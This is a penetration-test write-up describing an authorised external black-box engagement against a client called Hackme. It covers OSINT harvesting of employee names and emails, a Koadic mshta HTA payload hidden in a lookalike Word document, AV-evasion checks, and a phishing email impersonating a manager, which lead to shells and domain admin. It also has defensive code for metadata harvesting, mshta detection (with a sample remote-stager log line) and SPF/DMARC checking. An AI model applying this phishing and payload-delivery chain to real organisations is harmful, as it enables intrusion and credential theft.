The Black Box Penetration Testing is a way to figure out how secure a system is without knowing how it works. Testers act like outside attackers and use information that is available to the public to find holes and exploit them.
The goal was simple: to see how vulnerable the organization is from the outside and to test how well its organization-wide security controls hold up.
Other than the company's name, we had zero information to start the external black-box test with.
Penetration testing is an important part of a full security plan. It mimics real-world attacks to find holes in an organization’s systems.
Black box penetration testing is one of the most popular ways to do this kind of testing. The name “black box” comes from electronics and systems theory, where a “black box” is a system whose inner workings are unknown to the user or don’t matter.
This external black-box penetration test was performed for a client, referred to here as Hackme.
We kicked off with some Open Source Intelligence (OSINT) 101 :).
There are many open-source intelligence tools for gathering e-mail addresses, subdomains, hosts, employee names and similar data from public sources such as search engines and Shodan; exhaustive lists of such tools are easy to find online.
Using several of these tools, we collected the organization's publicly available documents.
With Google dorks to the rescue, we ran some basic search strings such as: site:*.hackme.com ext:xls OR ext:docx OR ext:pptx
Of course, our aim was not to search tirelessly for documents.
Rather, the objective was to learn the organization's naming scheme from the metadata of those documents, which is found in the Properties pane of Word, PowerPoint and Excel files (author, last modified by, company). FOCA automates this extraction.
From this we noticed that employee e-mail addresses followed a clear convention: first initial + surname @ domain, e.g. rakinyele@hackme.com.
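The metadata read-out described above, as an added example that is not the author's own tooling (the post used FOCA and the Properties pane): it opens Office Open XML packages (.docx/.xlsx/.pptx are zip files) and pulls the creator, last-modified-by and company fields, then counts the author strings across a set of documents, which is where username-style values such as "rakinyele" show up. The sample documents are constructed in memory; on an engagement you would feed it the files downloaded from the dork results. All names and the company are placeholders.

```python
"""Harvest author metadata from Office Open XML files (.docx/.xlsx/.pptx).

Added example for this write-up, not the author's own tooling. The sample
documents below are constructed in memory; on an engagement you would pass in
the files pulled down from the site:*.hackme.com dork instead.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from collections import Counter

# Word, Excel and PowerPoint all store creator / last-modified-by in
# docProps/core.xml and the Company field in docProps/app.xml.
NS = {
    "dc": "http://purl.org/dc/elements/1.1/",
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
}


def office_metadata(blob: bytes) -> dict:
    """Return creator, lastModifiedBy and company (when present) from an OOXML package."""
    out = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as z:
        names = set(z.namelist())
        if "docProps/core.xml" in names:
            root = ET.fromstring(z.read("docProps/core.xml"))
            for key, path in (("creator", "dc:creator"), ("lastModifiedBy", "cp:lastModifiedBy")):
                node = root.find(path, NS)
                if node is not None and node.text and node.text.strip():
                    out[key] = node.text.strip()
        if "docProps/app.xml" in names:
            # app.xml uses a default namespace; a regex is enough for one tag.
            m = re.search(rb"<Company>([^<]+)</Company>", z.read("docProps/app.xml"))
            if m:
                out["company"] = m.group(1).decode("utf-8", "replace").strip()
    return out


def harvest(blobs) -> Counter:
    """Count every distinct author-ish string across a set of documents.

    Creator fields are often raw usernames (e.g. 'rakinyele'), which is exactly
    the naming-convention hint the recon step is after.
    """
    counts = Counter()
    for blob in blobs:
        md = office_metadata(blob)
        for key in ("creator", "lastModifiedBy"):
            if key in md:
                counts[md[key]] += 1
    return counts


def make_sample_docx(creator: str, modified_by: str, company: str) -> bytes:
    """Constructed test fixture: a minimal zip carrying only the two metadata parts."""
    core = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<cp:coreProperties xmlns:cp="%s" xmlns:dc="%s">'
        "<dc:creator>%s</dc:creator><cp:lastModifiedBy>%s</cp:lastModifiedBy>"
        "</cp:coreProperties>" % (NS["cp"], NS["dc"], creator, modified_by)
    )
    app = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties">'
        "<Company>%s</Company></Properties>" % company
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("docProps/core.xml", core)
        z.writestr("docProps/app.xml", app)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed sample set standing in for downloaded Hackme documents.
    samples = [
        make_sample_docx("rakinyele", "jdoe", "Hackme"),
        make_sample_docx("jdoe", "rakinyele", "Hackme"),
        make_sample_docx("Alice Smith", "", ""),
    ]
    for name, n in harvest(samples).most_common():
        print(f"{n:3d}  {name}")
```

Point it at a directory of real downloads by reading each file's bytes into office_metadata(); documents saved by older binary formats (.doc/.xls) are OLE compound files, not zips, and need a different parser.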
Armed with this knowledge, we pulled the list of Hackme's current employees from LinkedIn with the following Google dork:
site:linkedin.com -inurl:dir "at Hackme" "Current"
(The original post shows a screenshot of this search using Google Inc. as a reference company.)
With a quick script to automate the process, we copied out the first names, last names and roles of Hackme's current employees.
The tiring alternative is to crawl through the Google result pages by hand; GoogleScraper does the same job:
GoogleScraper -m http --keyword "site:linkedin.com -inurl:dir 'at Hackme' 'Current'" --num-pages-for-keyword 3 --output-filename output.json
From there the possibilities are up to you: convert the JSON output to .csv with https://json-csv.com/ or any other converter that works for you,
then, with your favourite editor (Word Merge, Notepad++, etc.) or a little scripting, combine first name + last name according to the convention to form your e-mail list.
Since we are simulating Black-box Penetration Testing, we decided (just like what an attacker would do) to gain code execution using malicious payloads.
As such, we thought of creating a payload and sending it via email to employees of Hackme.
We also know that it is a common practice for some file types/extensions to be blocked by the organization’s email filters – to limit exposure to risk.
This brought us to Koadic C3 COM Command & Control, a very decent post-exploitation framework in the same vein as Meterpreter or Empire.
What makes it stand out, aside from the clean interface, is that it lets you dump hashes, download/upload files, execute commands, bypass UAC, scan the local network for open SMB, pivot to another machine, load mimikatz, and a lot more.
So we ran Koadic and set the required variables, using the "stager/js/mshta" module (it serves payloads in memory via MSHTA.exe HTML Applications).
The result was our HTA payload URL (shown as a screenshot in the original post).
However, we needed our targets to execute the payload as "mshta payload_url".
HTA payloads have been used for years as a web attack vector and as a way to drop malware on a victim's PC.
Now we needed to get this payload past the victim's numerous defenses.
Here comes the tricky part: we needed a way to have the victim run "mshta payload_url" without our payload appearing as a child process of mshta.exe, since we suspected the organization's blue team would flag that parent/child relationship.
Thankfully, we came across a tip from Matt Nelson, and the team at NCC Group has implemented the same idea in Demiguise.
Our final payload was saved as a .hta file (the original post shows it in a screenshot).
The next step is to embed the .hta payload in a Word document as an OLE object.
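The parent/child concern raised above is exactly what a blue team hunts for, so here is the defender's side as an added example (not part of the original post): three rules run over process-creation telemetry, flagging mshta.exe launched with a remote URL or UNC argument, mshta.exe spawned by an Office process (the embedded-object case), and scripting or LOLBin processes spawned as children of mshta.exe. The log lines are constructed in a simplified key=value rendering of Sysmon Event ID 1 fields; real Sysmon events are XML, so parse_line() is the part to adapt. Paths, the user name and the 198.51.100.7 address are placeholders.

```python
"""Spotting the mshta.exe delivery chain in process-creation telemetry.

Added example from the defender's side, not part of the original post. Sample
log lines are constructed; hosts, paths and addresses are placeholders.
"""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}
# http(s) URL or a UNC path (\\host\share) anywhere in the command line
URL_RE = re.compile(r"https?://|\\\\[\w.-]+\\", re.I)
FIELDS = ("Image", "ParentImage", "CommandLine")


def parse_line(line: str) -> dict:
    """'Image=C:\\...\\mshta.exe ParentImage=... CommandLine=...' -> dict.

    Values contain spaces (Program Files, command arguments), so each value runs
    until the next known field name rather than the next whitespace.
    """
    fields = {}
    for key in FIELDS:
        m = re.search(r"(?:^|\s)%s=(.*?)(?=\s(?:%s)=|$)" % (key, "|".join(FIELDS)), line)
        if m:
            fields[key] = m.group(1).strip()
    return fields


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict):
    """Return the list of reasons this event is suspicious (empty list = benign)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if image == "mshta.exe":
        if URL_RE.search(cmd):
            reasons.append("mshta launched with a remote URL/UNC argument")
        if parent in OFFICE_APPS:
            reasons.append(f"mshta spawned by Office application {parent}")
    if parent == "mshta.exe" and image in SCRIPT_HOSTS:
        reasons.append(f"{image} spawned as a child of mshta.exe")
    return reasons


def detect(lines):
    """Run classify() over raw log lines; returns [(line_number, reasons), ...] for hits only."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = classify(parse_line(line))
        if reasons:
            hits.append((n, reasons))
    return hits


# Constructed sample telemetry: one remote stager from Word, one child of mshta,
# one locally double-clicked .hta, one benign process.
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\mshta.exe ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE CommandLine=mshta http://198.51.100.7:9999/index.hta",
    r"Image=C:\Windows\System32\rundll32.exe ParentImage=C:\Windows\System32\mshta.exe CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
    r"Image=C:\Windows\System32\mshta.exe ParentImage=C:\Windows\explorer.exe CommandLine=mshta C:\Users\jdoe\Desktop\Lunch Menu.hta",
    r"Image=C:\Windows\System32\notepad.exe ParentImage=C:\Windows\explorer.exe CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for n, reasons in detect(SAMPLE_LOG):
        print(f"line {n}: " + "; ".join(reasons))
```

Note what the rules do not catch: a local .hta double-clicked from Explorer (line 3) raises nothing here, which is why a Demiguise-style payload that lands as a file and runs with a clean parent is harder to spot than a bare "mshta http://..." stager; pair these rules with mshta.exe network connections (Sysmon Event ID 3) for coverage of that case.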
Now we get to the interesting part: we need the victim to open the Word document and, with it, our payload.
To do that we needed a compelling story, because users are getting smarter. So we headed back to doing more recon.
We need to know more about Hackme – specifically the culture and employees’ behavior.
The question we kept asking ourselves was “what would interest the employees?”
Where else to get this information than Glassdoor, a platform that gives you an inside scoop on companies with employee reviews about salaries, benefits, and pros and cons of working with the company?
After poring through reviews of Hackme on Glassdoor, we found some common themes:
As the old saying goes, the fastest way to a man’s heart is through his stomach.
So what better way to get employees to open our payload-laden Word document
than an e-mail telling them there is a change in the FREE LUNCH menu starting tomorrow?
Rather than send a generic phishing e-mail that could be spotted easily, we decided a seemingly genuine one would be ideal, complete with a Hackme e-mail signature and matching the organization's e-mail culture.
Now, how do we make the e-mail more believable? By sending a service request to Customer Service/Help Desk and observing the e-mail signature in the reply.
We headed back to LinkedIn for the name of either the HR Manager, Logistics Manager or Admin Manager (whichever was appropriate) of Hackme, and carefully crafted an e-mail signature with the name we selected.
We are halfway through sending our payload now. Have some patience and read on…
From the metadata recon done earlier, we could tell what Hackme's document headers and footers looked like.
I then created a new Word document that was a spitting image of the Hackme document template, with matching headers and footers (shown in a screenshot in the original post).
The embedded object's icon was changed to Microsoft Word's icon and its caption changed to reflect our message.
To check the AV detection rate of our payload, and whether Hackme's antivirus solution (if any) would flag it as malicious, we ran a quick scan on nodistribute.com, chosen because, according to them, they do not share submitted samples with AV companies. We scanned both the maldoc and the .hta file.
AV scan of our .hta payload: 0 detections (screenshot in the original post).
If the target organization does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager's, Logistics Manager's or Admin Manager's e-mail address outright.
In this case, I created a Gmail account (yes, Gmail works too) in the Logistics Manager's first and last name, and spiced it up with the signature obtained earlier.
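The SPF/DKIM/DMARC check mentioned above, as an added example (not from the original post): it evaluates record strings you have already fetched, for instance with dig +short TXT hackme.com and dig +short TXT _dmarc.hackme.com, and returns a verdict on whether the exact domain can be spoofed. The point it makes explicit is that SPF alone decides nothing: without a DMARC policy of quarantine or reject, an SPF failure is never tied to the visible From: address, so the mail is still delivered. The records below are constructed samples and hackme.com is the write-up's placeholder domain.

```python
"""Can the target's domain be spoofed? A quick read of its SPF and DMARC records.

Added example, not from the original post. Pass in the TXT record strings
fetched for the domain and for _dmarc.<domain>; the samples are constructed.
"""


def parse_spf(record):
    """Return {'all': qualifier, 'mechanisms': [...]} for a v=spf1 record, or None if absent/invalid.

    qualifier is '+', '-', '~' or '?' for the 'all' term, or None when the record
    has no 'all' term at all (unlisted hosts then get a neutral result).
    """
    if not record or not record.lower().startswith("v=spf1"):
        return None
    mechanisms = record.split()[1:]
    qualifier = None
    for term in mechanisms:
        if term.lower().lstrip("+-~?") == "all":
            qualifier = term[0] if term[0] in "+-~?" else "+"   # bare 'all' means '+all'
    return {"all": qualifier, "mechanisms": mechanisms}


def parse_dmarc(record):
    """Return the tag=value pairs of a v=DMARC1 record, or None if absent/invalid."""
    if not record or not record.lower().startswith("v=dmarc1"):
        return None
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    return tags


def assess(spf_record, dmarc_record):
    """Return (verdict, findings); verdict is 'spoofable', 'weak' or 'enforced'."""
    findings = []
    spf = parse_spf(spf_record)
    dmarc = parse_dmarc(dmarc_record)

    if spf is None:
        findings.append("no SPF record: any host may send as this domain")
    elif spf["all"] == "+":
        findings.append("SPF ends with +all: every host passes, so DMARC alignment is trivially satisfied")
    elif spf["all"] in (None, "?"):
        findings.append("SPF gives neutral for unlisted hosts (no all / ?all): relies entirely on DMARC+DKIM")
    elif spf["all"] == "~":
        findings.append("SPF softfail (~all): receivers usually deliver anyway unless DMARC enforces")

    policy = "none" if dmarc is None else dmarc.get("p", "none").lower()
    if dmarc is None:
        findings.append("no DMARC record: SPF/DKIM results are never tied to the From: header")
    elif policy == "none":
        findings.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        findings.append(f"DMARC has unexpected policy '{policy}'")
    else:
        pct = dmarc.get("pct")
        if pct and pct.isdigit() and int(pct) < 100:
            findings.append(f"DMARC pct={pct}: policy applied to only part of the traffic")

    if dmarc is None or policy == "none":
        verdict = "spoofable"            # nothing enforces alignment, whatever SPF says
    elif spf is not None and spf["all"] == "+":
        verdict = "spoofable"            # +all makes SPF pass for anyone, so DMARC passes too
    elif findings:
        verdict = "weak"
    else:
        verdict = "enforced"
    return verdict, findings


if __name__ == "__main__":
    # Constructed records for the placeholder domain.
    cases = {
        "nothing published": (None, None),
        "SPF softfail, DMARC monitoring": ("v=spf1 include:_spf.example.net ~all", "v=DMARC1; p=none; rua=mailto:dmarc@hackme.com"),
        "SPF hardfail, DMARC reject": ("v=spf1 ip4:198.51.100.0/24 -all", "v=DMARC1; p=reject; rua=mailto:dmarc@hackme.com"),
    }
    for label, (spf_rec, dmarc_rec) in cases.items():
        verdict, findings = assess(spf_rec, dmarc_rec)
        print(f"{label}: {verdict}")
        for f in findings:
            print("  -", f)
```

An "enforced" verdict only closes the exact-domain spoof; the lookalike-sender route the author actually used (a free-mail account in the manager's name) is unaffected by any of these records, which is why the post's Gmail trick still worked.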
Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!
What next?
The rest, as they say, is history. From there, using the mimikatz modules, we escalated privileges, dumped hashes, scanned Hackme's local network, pivoted to other PCs, browsed the targets' file systems and eventually became domain admins.
All in all, this was a very fun engagement. It may take an attacker a month, two months or a year of dedicated effort to break into an organization through a loophole at the infrastructure level.
Black box penetration testing is an important diagnostic tool because it mimics the methods and points of view of an outside attacker.
By not knowing how a system works on the inside, this method gives an accurate picture of how vulnerable an organization is to the outside world.
But, like any other method, it has limitations. Since it takes an outsider's point of view, it can miss internal flaws.
Meanwhile, it can be fairly easy to gain access by exploiting the human factor.
“Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.
The moral of the exercise is: recon, recon and more recon, for as a wise man once said,
"Give me six hours to chop down a tree and I will spend the first four sharpening the axe."
1. Is penetration testing black box or white box?
Depending on what the tester knows, penetration testing can be either a black box or a white box. Black box testing pretends to be an attack from the outside, without knowing anything about the system being tested.
White box testing, on the other hand, gives the tester a lot of information, like the source code or diagrams of the design. The method used depends on the goals of the test and how in-depth it needs to be.
2. What is a black box penetration test?
A black box test is a way to figure out how secure a system is without knowing how it works. Testers act like outside attackers and use information that is available to the public to find holes and exploit them.
The main goal is to imitate a real-world attack so that security flaws can be found from an outsider’s point of view. This method helps find weaknesses that could be used against an organization and tries its defenses from the outside.
3. What is SAST and DAST?
SAST, or Static Application Security Testing, is a testing method that looks at an application’s source code, bytecode, or binary code without running it. This helps find security flaws early on in the development process.
On the other hand, DAST (Dynamic Application Security Testing) looks at running applications in real-time, usually from the outside, to find vulnerabilities that show up while the application is working.
Rotimi Akinyele – Rotimi is an experienced Cybersecurity, IT Governance, Risk, and Compliance (GRC) professional. He is an Assistant Manager, Cybersecurity at BDO UAE.
Excellent pentesting guide. Good work, man.